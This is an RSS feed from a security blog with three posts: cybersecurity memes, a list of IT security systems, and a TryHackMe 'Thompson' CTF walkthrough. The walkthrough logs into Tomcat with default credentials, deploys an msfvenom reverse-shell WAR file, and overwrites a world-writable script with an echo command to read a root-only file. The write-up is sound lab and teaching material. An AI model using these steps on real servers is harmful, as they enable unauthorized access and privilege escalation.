<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Logan</title>
	<atom:link href="https://eric.cc/feed/" rel="self" type="application/rss+xml" />
	<link>https://eric.cc/</link>
	<description>A security and programming blog.</description>
	<lastBuildDate>Wed, 14 Jan 2026 02:53:54 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://i0.wp.com/eric.cc/wp-content/uploads/2021/03/favicon.png?fit=16%2C16&#038;ssl=1</url>
	<title>Eric Logan</title>
	<link>https://eric.cc/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211060323</site>	<item>
		<title>Top 5 Cybersecurity Memes Every IT Pro Will Relate To</title>
		<link>https://eric.cc/top-5-cybersecurity-memes/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=top-5-cybersecurity-memes</link>
					<comments>https://eric.cc/top-5-cybersecurity-memes/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Apr 2026 15:30:00 +0000</pubDate>
				<category><![CDATA[Miscellaneous]]></category>
		<category><![CDATA[memes]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=1384</guid>

					<description><![CDATA[<p><a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Everyone on April Fool&#8217;s Day deserves a hearty laugh, especially those working in IT and cybersecurity. Memes are just as fast-paced as some of the technology trends. Here are the top 5 cybersecurity memes that every IT pro will relate to. Cybersecurity Meme 1 &#8211; Friday deployments If you want to ruin the start (or [&#8230;]</p>
<p>The post <a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">Everyone on April Fool&#8217;s Day deserves a hearty laugh, especially those working in IT and cybersecurity. Memes are just as fast-paced as some of the technology trends. Here are the top 5 cybersecurity memes that every IT pro will relate to.</p>



<h2 class="wp-block-heading">Cybersecurity Meme 1 &#8211; Friday deployments</h2>



<p class="wp-block-paragraph">If you want to ruin the start (or entire) weekend, introduce changes to your environment on a Friday. You might have even joked, &#8220;What is the worst that can happen?&#8221; Next thing you know, you&#8217;re opening severity 1 critical tickets, debugging, or reverting changes.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" fetchpriority="high" decoding="async" width="800" height="674" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-2.png?resize=800%2C674" alt="Meme #1 - Ruin your week by deploying on Friday meme." class="wp-image-1427" style="width:692px;height:auto" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?w=800&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?resize=300%2C253&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-2.png?resize=768%2C647&amp;ssl=1 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 2 &#8211; Phishing attacks</h2>



<p class="wp-block-paragraph">Outsmarting cyber attackers 101. If you never open your inbox, you cannot fall for their phishing emails.  A flawless (and impractical) security strategy.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" decoding="async" width="633" height="352" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-1.png?resize=633%2C352" alt="The Top 5 Cybersecurity Meme  #2 - Too smart to fall for phishing meme" class="wp-image-1426" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-1.png?w=633&amp;ssl=1 633w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-1.png?resize=300%2C167&amp;ssl=1 300w" sizes="(max-width: 633px) 100vw, 633px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 3 &#8211; Alerts, Alerts, Alerts</h2>



<p class="wp-block-paragraph">Joining the SOC team feels exciting at first — you’re ready to defend, detect, and dive into threats. But after 1,000 alerts, every analyst has a few war stories…</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" decoding="async" width="666" height="1024" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-666x1024.png?resize=666%2C1024" alt="The Top 5 Cybersecurity Meme  #3 - SOC alert fatigue meme" class="wp-image-1425" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=666%2C1024&amp;ssl=1 666w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=195%2C300&amp;ssl=1 195w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=768%2C1181&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?resize=999%2C1536&amp;ssl=1 999w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image.png?w=1079&amp;ssl=1 1079w" sizes="(max-width: 666px) 100vw, 666px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 4 &#8211; Robot beats &#8220;I am not a Robot&#8221; Captcha</h2>



<p class="wp-block-paragraph">I think this pretty much speaks for itself.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="535" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-1024x535.png?resize=1024%2C535" alt="The Top 5 Cybersecurity Meme  #4 - not a robot captcha" class="wp-image-1446" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=1024%2C535&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=300%2C157&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?resize=768%2C401&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image.png?w=1399&amp;ssl=1 1399w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">Cybersecurity Meme 5 &#8211; Giving proprietary information to AI.. What could go wrong?</h2>



<p class="wp-block-paragraph">It is easy to get lazy and to upload just about anything into Artificial Intelligence. ChatGPT, write me an apology email to upper management for using AI to write my emails.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="800" height="796" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/03/image-3.png?resize=800%2C796" alt="The Top 5 Cybersecurity Meme  #5 - AI meme" class="wp-image-1431" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?w=800&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/03/image-3.png?resize=768%2C764&amp;ssl=1 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>



<p class="wp-block-paragraph">Happy April Fool&#8217;s Day 😁👍 &#8211; you can find more than the top 5 cybersecurity <a href="https://www.reddit.com/r/CybersecurityMemes/">memes here</a>. </p>



<p class="wp-block-paragraph">You can read more of my blog <a href="http://vps-1a659a37.vps.ovh.us/blog">here</a>.</p>



<p class="wp-block-paragraph"></p>
<p>The post <a href="https://eric.cc/top-5-cybersecurity-memes/">Top 5 Cybersecurity Memes Every IT Pro Will Relate To</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/top-5-cybersecurity-memes/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1384</post-id>	</item>
		<item>
		<title>10 Information Technology Systems Every Company Should Have</title>
		<link>https://eric.cc/it-systems-every-company-should-have/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=it-systems-every-company-should-have</link>
					<comments>https://eric.cc/it-systems-every-company-should-have/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Thu, 15 Jan 2026 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[Information Technology]]></category>
		<category><![CDATA[Infosec]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=1382</guid>

					<description><![CDATA[<p><a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Every company invests a percentage of its budget towards technology. Security solutions includes tooling for endpoint security, network security, cloud security, data security, and identity access management. Not every solution will be covered in this post, and I will not go into vendor specifics. In no order of priority, every company should have these 10 [&#8230;]</p>
<p>The post <a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<p class="wp-block-paragraph">Every company invests a percentage of its budget towards technology. Security solutions includes tooling for endpoint security, network security, cloud security, data security, and identity access management. Not every solution will be covered in this post, and I will not go into vendor specifics. In no order of priority, every company should have these 10 IT Systems in place.</p>



<h2 class="wp-block-heading">EDR/AntiVirus</h2>



<p class="wp-block-paragraph">Endpoints are laptops, desktops, servers, and virtual machines. They are often the first to get compromised and all need to be secured from bad actors. This is where AntiVirus and Endpoint Defender Response (EDR) solutions come in. AntiVirus offers real-time malware protection, blocking known threats and alerting analysts of malicious activity. EDR solutions can identify suspicious behavior and enable analysts to respond to a security incident.</p>



<p class="wp-block-paragraph">How many times a month do you read about computers being compromised and spreading ransomware throughout a company? An antivirus solution could have prevented the malware from running in the first place. EDR software could have detected the suspicious behavior and quarantined the device from communicating with the rest of the network, preventing the malware from spreading.</p>



<p class="wp-block-paragraph">It cannot be emphasized enough how crucial it is to deploy software on endpoints that can monitor, protect, and prevent attacks.</p>



<p class="wp-block-paragraph">Although Microsoft has improved its Windows Defender product, it is the first hurdle any attacker is going to clear for creating malware. It is enabled by default on every Windows computer after all. </p>



<h2 class="wp-block-heading">SIEM &#8211; Logging</h2>



<p class="wp-block-paragraph">The Security Information Event Management (SIEM) collects system, application, cloud, and networking logs in a central location. Analysts can investigate alerts, visualize data, and monitor their IT environments. </p>



<p class="wp-block-paragraph">This provides visibility for the Security Operations Center (SOC) to perform their investigations. For example, an employee downloads a malicious file from a website, the malware elevates its privileges to admin and starts connecting to a botnet. A SIEM can log all this information and correlate these events for an analyst to investigate which websites the employee visited, what the malware is doing on the machine, and where its communicating to.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="576" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-3-1024x576.png?resize=1024%2C576" alt="IT Systems - SIEM technology" class="wp-image-1458" style="width:754px;height:auto" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=300%2C169&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-3.png?w=1280&amp;ssl=1 1280w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">VPN &#8211; Virtual Private Network</h2>



<p class="wp-block-paragraph">No, I am not talking about consumer VPN products you might have heard from your favorite influencer.</p>



<p class="wp-block-paragraph">With the rise of remote working, employees need a Virtual Private Network to securely connect to the office network to work on their projects. An enterprise VPN is going to be a split tunnel VPN that allows internal routing to go through, and external access through the employee&#8217;s own Internet Service Provider. Consumer-based VPNs are full tunnel routing all traffic through the VPN for security and encryption.</p>



<p class="wp-block-paragraph">VPNs are the best way to access resources remotely without having to expose assets to the public internet. VPN gateways, clients, and infrastructure must be protected heavily, as they could allow anyone access to the corporate network.</p>



<h2 class="wp-block-heading">Proxy &#8211; Internet Traffic Inspection</h2>



<p class="wp-block-paragraph">Another key point is once a device or user is connected, anything can happen on a network. It is important to monitor the traffic ingress and egress; and determine if it is malicious/inappropriate usage. This is the best way to block traffic that is not meant to go out of your corporate environment. NSFW or malicious.</p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="393" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-2-1024x393.png?resize=1024%2C393" alt="IT Systems - Proxy Technology" class="wp-image-1457" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=1024%2C393&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=300%2C115&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=768%2C295&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=1536%2C589&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?resize=2048%2C786&amp;ssl=1 2048w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-2.png?w=2400&amp;ssl=1 2400w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading"><br>Segmentation &amp; Firewall</h2>



<p class="wp-block-paragraph">Typically home networks are flat, meaning that once a device is connected, it can communicate to every other device on the network. With the spirit of least privilege access, organizations should never have a flat network. If devices do not need it, they should not access different network segments.</p>



<p class="wp-block-paragraph">The best way to segment networks is by using Virtual LANs (VLANs) and Firewalls. VLANs will separate where on the network a device or application will communicate. Firewalls will allow or block cross-network communication when talking to different parts of the network.</p>



<p class="wp-block-paragraph">Generally speaking, networks should be separated by intranet, DMZ, extranet, production separated from development, and BYOD/IoT devices to be their own isolated network. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="668" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2025/06/image-1-1024x668.png?resize=1024%2C668" alt="IT Systems - Firewall technology" class="wp-image-1456" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=1024%2C668&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=300%2C196&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?resize=768%2C501&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2025/06/image-1.png?w=1033&amp;ssl=1 1033w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading"><br>Backups</h2>



<p class="wp-block-paragraph">It&#8217;s always good to have backups of systems. Whether it is a system image or an application configuration. Backups should be taken regularly and are essential for dealing with a ransomware incident. Everybody needs a backup, and you will be glad you backed it up before things went wrong. </p>



<p class="wp-block-paragraph">To minimize the risk of data loss, follow the 3-2-1 backup rule. Keep 3 copies of your data, stored on 2 different types of media, with 1 copy kept off-site.</p>



<h2 class="wp-block-heading">Multifactor &#8211; Authentication</h2>



<p class="wp-block-paragraph">Every month, there is a new article about a leak of billions of passwords hitting the internet. Here&#8217;s an <a href="https://www.bleepingcomputer.com/news/security/no-the-16-billion-credentials-leak-is-not-a-new-data-breach/">article</a> about that happening recently.</p>



<p class="wp-block-paragraph">As cybersecurity professionals, we get it, passwords alone are no longer secure enough to protect accounts. Multifactor authentication provides security by checking that the user authenticating has their smartphone or biometrics. In today&#8217;s threat landscape, MFA should not rely on sending a text message to phone numbers due to attacks like SIM swapping. MFA should be done with a mobile authenticator app or a device like a yubikey.</p>



<h2 class="wp-block-heading">Email Security</h2>



<p class="wp-block-paragraph">Email is the lifeblood of professional communication over the last 25 years on the Internet. Everyone online has an email address. </p>



<p class="wp-block-paragraph">Not every emailer has their recipients&#8217; best interests in mind. Any IT security-related exam will tell you all the various Phishing techniques that can be done through email. So it is imperative to have good technologies in place to block suspicious looking emails, including those that contain suspicious attachments.</p>



<p class="wp-block-paragraph">Technology is not the only solution to this problem. The best way to defend against email based attacks is training. Employees should know the signs of a phishing attack and learn the processes of reporting it to the IT department. </p>



<h2 class="wp-block-heading"><strong>Patch Management</strong></h2>



<p class="wp-block-paragraph">What good are securing servers and workstations if they are not up to date on security patching? New exploits come out all the time. For example, a JavaScript framework React had a critical vulnerability named React2Shell, which allowed attackers to remotely execute code on any affected machine with an HTTP request. Updating software is the best way to avoid being vulnerable.</p>



<p class="wp-block-paragraph">Microsoft releases a patch for Microsoft Windows machines on every second Tuesday of the month. Linux does not have a fixed timeline for releaseing patches, they are released whenever they become available.</p>



<h2 class="wp-block-heading">Vulnerability Scanning</h2>



<p class="wp-block-paragraph">Lastly, vulnerability scanners can bring attention to analysts what technologies should be addressed, the priority it should be fixed in, and to catch concerns early before they become an issue. It is too common for organizations to keep old devices around because they run an applciation that stopped receiving updated years ago. Vulnerability scanners can call out these old devices and justify that they reached the end of their lifecycle.</p>



<p class="wp-block-paragraph">As mentioned before, patch management is a good way to knock out the easy wins. However, some applications or software require a more in depth look to remediate the vulnerabilities.</p>
<p>The post <a href="https://eric.cc/it-systems-every-company-should-have/">10 Information Technology Systems Every Company Should Have</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/it-systems-every-company-should-have/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1382</post-id>	</item>
		<item>
		<title>TryHackMe: Thompson</title>
		<link>https://eric.cc/tryhackme-thompson/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-thompson</link>
					<comments>https://eric.cc/tryhackme-thompson/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Tue, 04 Jul 2023 14:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=487</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>TryHackMe Thompson is a boot2root machine for FIT and bsides guatemala CTFs. Challenging players to generate payloads and abuse file perms.</p>
<p>The post <a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">TryHackMe: <a href="https://tryhackme.com/room/bsidesgtthompson">Thompson</a> was first released for the FIT and bsides Guatemala CTF.  To get right into it, Thompson&#8217;s server is running a default installation of Tomcat, with default administrator credentials. We gain initial access to the web server by uploading a malicious war file. Then misuse file permissions to read protected files.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="309" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/1.-Task-1-1-1024x309.png?resize=1024%2C309" alt="Thompson Task 1" class="wp-image-1043" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=1024%2C309&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=300%2C90&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?resize=768%2C231&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/1.-Task-1-1.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task 1</figcaption></figure>



<p class="wp-block-paragraph">In a CTF-like fashion, there is no prior information about this engagement. The goal of this room is to find, get access, and read the user.txt and root.txt flags. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="769" height="347" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/2.-nmap-j.png?resize=769%2C347" alt="Thompson nmap scan" class="wp-image-1163" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/2.-nmap-j.png?w=769&amp;ssl=1 769w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/2.-nmap-j.png?resize=300%2C135&amp;ssl=1 300w" sizes="(max-width: 769px) 100vw, 769px" /><figcaption class="wp-element-caption">Nmap scan</figcaption></figure>



<p class="wp-block-paragraph">The Nmap scan indicates that there are three ports open. The services running are SSH, Apache Jserver, and Apache Tomcat.</p>



<p class="wp-block-paragraph">By opening the browser, we navigate the website hosting Tomcat on <strong>port 8080</strong>. This is a default installation of Apache Tomcat version 8.5.5. Tomcat is an open-source Java web application server.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1019" height="726" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=1019%2C726" alt="Tomcat version 8.5.5" class="wp-image-1165" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?w=1019&amp;ssl=1 1019w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=300%2C214&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/3.-website-8080-h.png?resize=768%2C547&amp;ssl=1 768w" sizes="(max-width: 1019px) 100vw, 1019px" /><figcaption class="wp-element-caption">Tomcat dashboard</figcaption></figure>



<p class="wp-block-paragraph">Have a look around on the Apache Tomcat dashboard. The Server Status displays general server information, system resources, and service status. Manager App provides basic functionality to deploy web apps. The Host Manager&#8217;s purpose is to deploy, configure, and manage virtual hosts. You can access these services by using Tomcat&#8217;s default credentials,  <strong>tomcat</strong>:<strong>s3cret</strong>. </p>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">Welcome to the Tomcat Web Application Manager for all your web app needs. </p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/7.-uploaded-shell-1024x603.png?resize=840%2C494" alt="" class="wp-image-1153" width="840" height="494" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=1024%2C603&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=300%2C177&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=768%2C452&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?resize=1536%2C904&amp;ssl=1 1536w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/7.-uploaded-shell.png?w=1881&amp;ssl=1 1881w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Tomcat web app manager</figcaption></figure>



<p class="wp-block-paragraph">The file type we use to deploy a web app is a war file. War stands for Web Application Resource and it is <a href="https://www.baeldung.com/java-jar-war-packaging"><strong>used to package web applications</strong> that we can deploy on any Servlet/JSP container.</a> </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="726" height="75" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/5.-war-file.png?resize=726%2C75" alt="Thompson msfvenom payload" class="wp-image-1047" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/5.-war-file.png?w=726&amp;ssl=1 726w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/5.-war-file.png?resize=300%2C31&amp;ssl=1 300w" sizes="(max-width: 726px) 100vw, 726px" /><figcaption class="wp-element-caption">msfvenom payload</figcaption></figure>



<p class="wp-block-paragraph">Using the payload above, we can craft a malicious war file named shell3.war. This is a reverse TCP shell, meaning we can upload the file and have it connect back to our attacking machine. msfvenom is a repository of payloads that can be crafted into many extensible files. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="813" height="519" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/05/8.-msf-handler.png?resize=813%2C519" alt="Thompson metasploit" class="wp-image-1049" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?w=813&amp;ssl=1 813w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?resize=300%2C192&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/05/8.-msf-handler.png?resize=768%2C490&amp;ssl=1 768w" sizes="(max-width: 813px) 100vw, 813px" /><figcaption class="wp-element-caption">Metasploit handler</figcaption></figure>



<p class="wp-block-paragraph">Run Metasploit&#8217;s multi-handler module and launch the malicious payload by opening it on your web browser. The shell will connect to our machine, and we now have access to the victim server.</p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Let&#8217;s get our bearing now that we are on the machine. We can see that we are the <strong>tomcat</strong> user of the system and in the root directory. The user.txt file lives in Jack&#8217;s home directory, and we have permission to read the file.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="490" height="97" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_2-h.png?resize=490%2C97" alt="Thompson user.txt flag" class="wp-image-1167" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_2-h.png?w=490&amp;ssl=1 490w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_2-h.png?resize=300%2C59&amp;ssl=1 300w" sizes="(max-width: 490px) 100vw, 490px" /><figcaption class="wp-element-caption">user.txt flag</figcaption></figure>



<p class="wp-block-paragraph">Looking at the rest of the contents in Jack&#8217;s home directory, we see a file named <code>id.sh</code>. The purpose of this file is to execute the <code>id </code>command and output it into the test.txt file. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="540" height="354" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_3-h.png?resize=540%2C354" alt="" class="wp-image-1169" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_3-h.png?w=540&amp;ssl=1 540w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_3-h.png?resize=300%2C197&amp;ssl=1 300w" sizes="(max-width: 540px) 100vw, 540px" /></figure>



<p class="wp-block-paragraph">Let&#8217;s take a look closer at the highlight portion above. We can see that the file&#8217;s permissions allow anyone to read, write, and execute this file. Meaning that we can potentially change the contents of the file.</p>



<p class="wp-block-paragraph">With the following bash command, we can change the contents of the <code>id.sh</code> file without changing any of the permissions or ownership of the file.</p>



<p class="wp-block-paragraph"><code>echo "cat /root/root.txt &gt; test.txt" &gt; id.sh</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="565" height="130" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Screenshot_4-h-1.png?resize=565%2C130" alt="Thompson root.txt" class="wp-image-1172" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_4-h-1.png?w=565&amp;ssl=1 565w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Screenshot_4-h-1.png?resize=300%2C69&amp;ssl=1 300w" sizes="(max-width: 565px) 100vw, 565px" /></figure>



<p class="wp-block-paragraph">Finally, we can cat out the test.txt file and find the root.txt file contents inside of it!</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">To conclude, TryHackMe: Thompson presented a nice challenge for FIT and bsides Guatemala CTFs. In my experience, gaining initial access to Tomcat&#8217;s system was trivial but I enjoyed misusing file permissions to read protected files. Running web applications like Tomcat with default credentials is asking for your system to get owned!</p>



